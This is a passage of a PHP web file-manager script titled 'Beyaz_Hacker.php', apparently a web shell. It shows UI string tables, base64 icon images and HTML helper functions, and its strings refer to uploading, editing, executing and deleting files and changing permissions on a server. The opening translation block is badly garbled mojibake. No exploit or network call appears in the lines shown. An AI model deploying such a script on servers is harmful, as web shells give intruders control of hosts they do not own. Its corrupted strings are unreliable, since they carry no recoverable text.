  2373. 'not_symlinked' => '����¯�¿�½������®����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ "[%2]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]".',
  2374. 'permission_for' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]":',
  2375. 'permission_set' => '����¯�¿�½������°����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ "[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ [%2].',
  2376. 'permission_not_set' => '����¯�¿�½������®����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½ "[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ [%2] .',
  2377. 'not_readable' => '"[%1]" ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½ ����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½����¯�¿�½���¯���¿���½.'
  2378.         );
  2379.  
  2380.     case 'en':
  2381.     default:
  2382.  
  2383.         $date_format = 'n/j/y H:i:s';
  2384.         $word_charset = 'ISO-8859-1';
  2385.  
  2386.         return array(
  2387. 'directory' => 'Directory',
  2388. 'file' => 'File',
  2389. 'filename' => 'Filename',
  2390.  
  2391. 'size' => 'Size',
  2392. 'permission' => 'Permission',
  2393. 'owner' => 'Owner',
  2394. 'group' => 'Group',
  2395. 'other' => 'Others',
  2396. 'functions' => 'Functions',
  2397.  
  2398. 'read' => 'read',
  2399. 'write' => 'write',
  2400. 'execute' => 'execute',
  2401.  
  2402. 'create_symlink' => 'create symlink',
  2403. 'delete' => 'delete',
  2404. 'rename' => 'rename',
  2405. 'move' => 'move',
  2406. 'copy' => 'copy',
  2407. 'edit' => 'edit',
  2408. 'download' => 'download',
  2409. 'upload' => 'upload',
  2410. 'create' => 'create',
  2411. 'change' => 'change',
  2412. 'save' => 'save',
  2413. 'set' => 'set',
  2414. 'reset' => 'reset',
  2415. 'relative' => 'Relative path to target',
  2416.  
  2417. 'yes' => 'Yes',
  2418. 'no' => 'No',
  2419. 'back' => 'back',
  2420. 'destination' => 'Destination',
  2421. 'symlink' => 'Symlink',
  2422. 'no_output' => 'no output',
  2423.  
  2424. 'user' => 'User',
  2425. 'password' => 'Password',
  2426. 'add' => 'add',
  2427. 'add_basic_auth' => 'add basic-authentification',
  2428.  
  2429. 'uploaded' => '"[%1]" has been uploaded.',
  2430. 'not_uploaded' => '"[%1]" could not be uploaded.',
  2431. 'already_exists' => '"[%1]" already exists.',
  2432. 'created' => '"[%1]" has been created.',
  2433. 'not_created' => '"[%1]" could not be created.',
  2434. 'really_delete' => 'Delete these files?',
  2435. 'deleted' => "These files have been deleted:\n[%1]",
  2436. 'not_deleted' => "These files could not be deleted:\n[%1]",
  2437. 'rename_file' => 'Rename file:',
  2438. 'renamed' => '"[%1]" has been renamed to "[%2]".',
  2439. 'not_renamed' => '"[%1] could not be renamed to "[%2]".',
  2440. 'move_files' => 'Move these files:',
  2441. 'moved' => "These files have been moved to \"[%2]\":\n[%1]",
  2442. 'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
  2443. 'copy_files' => 'Copy these files:',
  2444. 'copied' => "These files have been copied to \"[%2]\":\n[%1]",
  2445. 'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
  2446. 'not_edited' => '"[%1]" can not be edited.',
  2447. 'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
  2448. 'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
  2449. 'saved' => '"[%1]" has been saved.',
  2450. 'not_saved' => '"[%1]" could not be saved.',
  2451. 'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
  2452. 'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
  2453. 'permission_for' => 'Permission of "[%1]":',
  2454. 'permission_set' => 'Permission of "[%1]" was set to [%2].',
  2455. 'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
  2456. 'not_readable' => '"[%1]" can not be read.'
  2457.         );
  2458.  
  2459.     }
  2460.  
  2461. }
  2462.  
  2463. function getimage ($image) {
  2464.     switch ($image) {
  2465.     case 'file':
  2466.         return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
  2467.     case 'folder':
  2468.         return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
  2469.     case 'hidden_file':
  2470.         return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
  2471.     case 'link':
  2472.         return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
  2473.     case 'smiley':
  2474.         return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
  2475.     case 'arrow':
  2476.         return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
  2477.     }
  2478. }
  2479.  
  2480. function html_header () {
  2481.     global $site_charset;
  2482.  
  2483.     echo <<<END
  2484. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  2485.      "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  2486. <html xmlns="http://www.w3.org/1999/xhtml">
  2487. <head>
  2488.  
  2489. <meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
  2490.  
  2491. <title>Beyaz_Hacker.php</title>
  2492.  
  2493. <style type="text/css">
  2494. body { font: small sans-serif; text-align: center }
  2495. img { width: 17px; height: 13px }
  2496. a, a:visited { text-decoration: none; color: navy }
  2497. hr { border-style: none; height: 1px; background-color: silver; color: silver }
  2498. #main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
  2499. #main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
  2500. .listing th, .listing td { padding: 1px 3pt 0 3pt }
  2501. .listing th { border: 1px solid silver }
  2502. .listing td { border: 1px solid #ddd; background: white }
  2503. .listing .checkbox { text-align: center }
  2504. .listing .filename { text-align: left }
  2505. .listing .size { text-align: right }
  2506. .listing th.permission { text-align: left }
  2507. .listing td.permission { font-family: monospace }
  2508. .listing .owner { text-align: left }
  2509. .listing .group { text-align: left }
  2510. .listing .functions { text-align: left }
  2511. .listing_footer td { background: #eee; border: 1px solid silver }
  2512. #directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
  2513. #directory { background: #eee; border: 1px solid silver }
  2514. #upload { padding-top: 1em }
  2515. #create { padding-bottom: 1em }
  2516. .small, .small option { font-size: x-small }
  2517. textarea { border: none; background: white }
  2518. table.dialog { margin-left: auto; margin-right: auto }
  2519. td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
  2520. #permission { margin-left: auto; margin-right: auto }
  2521. #permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
  2522. td.permission_action { text-align: right }
  2523. #symlink { background: #eee; border: 1px solid silver }
  2524. #symlink td { text-align: left; padding: 3pt }
  2525. #red_button { width: 120px; color: #400 }
  2526. #green_button { width: 120px; color: #040 }
  2527. #error td { background: maroon; color: white; border: 1px solid silver }
  2528. #notice td { background: green; color: white; border: 1px solid silver }
  2529. #notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
  2530. code { font-size: 12pt }
  2531. td { white-space: nowrap }
  2532. </style>
  2533.  
  2534. <script type="text/javascript">
  2535. <!--
  2536. function activate (name) {
  2537.     if (document && document.forms[0] && document.forms[0].elements['focus']) {
  2538.         document.forms[0].elements['focus'].value = name;
  2539.     }
  2540. }
  2541. //-->
  2542. </script>
  2543.  
  2544. </head>
  2545. <body>
  2546.  
  2547.  
  2548. END;
  2549.  
  2550. }
  2551.  
  2552. function html_footer () {
  2553.  
  2554.     echo <<<END
  2555. </body>
  2556.  
  2557.  
  2558. </html>
  2559. END;
  2560.  
  2561. }
  2562.  
  2563. function notice ($phrase) {
  2564.     global $cols;
  2565.  
  2566.     $args = func_get_args();
  2567.     array_shift($args);
  2568.  
  2569.     return '<tr id="notice">
  2570.     <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
  2571. </tr>
  2572. ';
  2573.  
  2574. }
  2575.  
  2576. function error ($phrase) {
  2577.     global $cols;
  2578.  
  2579.     $args = func_get_args();
  2580.     array_shift($args);
  2581.  
  2582.     return '<tr id="error">
  2583.     <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
  2584. </tr>
  2585. ';
  2586.  
  2587. }
Add Comment
Please, Sign In to add comment